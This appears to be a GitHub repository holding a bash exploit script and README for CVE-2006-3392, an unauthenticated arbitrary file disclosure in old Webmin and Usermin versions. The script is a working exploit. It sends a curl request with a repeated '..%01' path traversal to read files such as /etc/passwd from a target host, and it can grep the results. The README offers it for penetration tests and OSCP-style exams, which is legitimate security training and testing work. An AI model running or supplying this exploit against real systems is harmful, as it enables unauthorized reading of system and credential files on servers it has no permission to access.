├── CVE-2006-3392.sh └── README.md /CVE-2006-3392.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Vulnerability: Arbitrary File Disclosure 4 | # Application: Webmin < 1.290 / Usermin < 1.220 5 | # Author: Ivan Glinkin 6 | # Contact: mail@ivanglinkin.com 7 | # Release date: December 04, 2020 8 | 9 | 10 | # Variables 11 | ## General 12 | host="127.0.0.1"; # Web-address - Change according to your needs 13 | port="10000"; # Port, by default 10000 14 | path="/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01"; 15 | file=$1; # Payload - File to read 16 | file_example="/etc/passwd"; # Example domain 17 | grep=$2; # grep string 18 | grep_example="bash"; # Example domain 19 | 20 | # Output 21 | 22 | ## Header 23 | echo -e "\n\e[00;33m╔═══════════════════════════════════════════════════════════════════════════╗\e[00m" 24 | echo -e "\e[00;33m║\t\t\t\t\t\t\t\t\t ║\e[00m" 25 | echo -e "\e[00;33m║\e[00m\e[01;32m\t Arbitrary File Disclosure - Webmin < 1.290 / Usermin < 1.220 \t \e[00m\e[00;33m║\e[00m" 26 | echo -e "\e[00;33m║\t\t\t\t\t\t\t\t\t ║\e[00m" 27 | echo -e "\e[00;33m╚═══════════════════════════════════════════════════════════════════════════╝\e[00m" 28 | echo -e "" 29 | echo -e "\e[00;33m[ ! ] https://www.linkedin.com/in/IvanGlinkin/ | @IvanGlinkin\e[00m" 30 | echo -e ""; 31 | 32 | if [ -z "$file" ] 33 | then 34 | echo -e "\e[00;33m[ ! ] Usage pattern:\e[00m" "\e[01;31m$0 file_name_to_read \e[00m\e[01;32m[grep string]\e[00m" 35 | echo -e "\e[00;33m[ ! ] Usage example:\e[00m" "\e[01;31m$0 $file_example\e[00m" 36 | echo -e "\e[00;33m[ ! ] Usage example:\e[00m" "\e[01;31m$0 $file_example \e[00m\e[01;32m$grep_example\e[00m\n" 37 | exit 38 | else 39 | echo -e "\e[00;33m[ ! ] Get information about \e[00m\e[01;31m$file\e[00m\e[00;33m file from \e[01;31m$host\e[00m\e[00;33m host\e[00m\n" 40 | fi 41 | 42 | #exploit 43 | if [ -z "$grep" ] 44 | then 45 | curl -s "$host:$port$path$file" 46 | else 47 | curl -s "$host:$port$path$file" | grep -i "$grep" 48 | fi 49 | #http://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 50 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2006-3392 2 | 3 | About the vulnerability 4 | ----------------------- 5 | A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220). 6 | 7 | This small script helps to avoid using MetaSploit (msfconsole) during the Enterprise pentests and OSCP-like exams. 8 | Grep included function will help you to get only the important information. 9 | 10 | Usage example: 11 | -------------- 12 | ``` 13 | nano CVE-2006-3392.sh 14 | change an IP-address (ctrl+O, ctrl+X) 15 | chmod +x CVE-2006-3392.sh 16 | ./CVE-2006-3392.sh /etc/passwd 17 | ``` 18 | or 19 | ``` 20 | ./CVE-2006-3392.sh /etc/passwd bash 21 | ``` 22 | 23 | 24 | An original article: 25 | -------------------- 26 | [https://www.ivanglinkin.com/CVE-2006-3392/](https://www.ivanglinkin.com/CVE-2006-3392/) 27 | 28 | 29 | Video example: 30 | -------------- 31 | ![](https://github.com/IvanGlinkin/media_support/blob/main/CVE-2006-3392-Video.gif?raw=true) 32 | 33 | 34 | Screenshots: 35 | ------------ 36 | ![](https://github.com/IvanGlinkin/media_support/blob/main/CVE-2006-3392-image.gif?raw=true) 37 | 38 | --------------------------------------------------------------------------------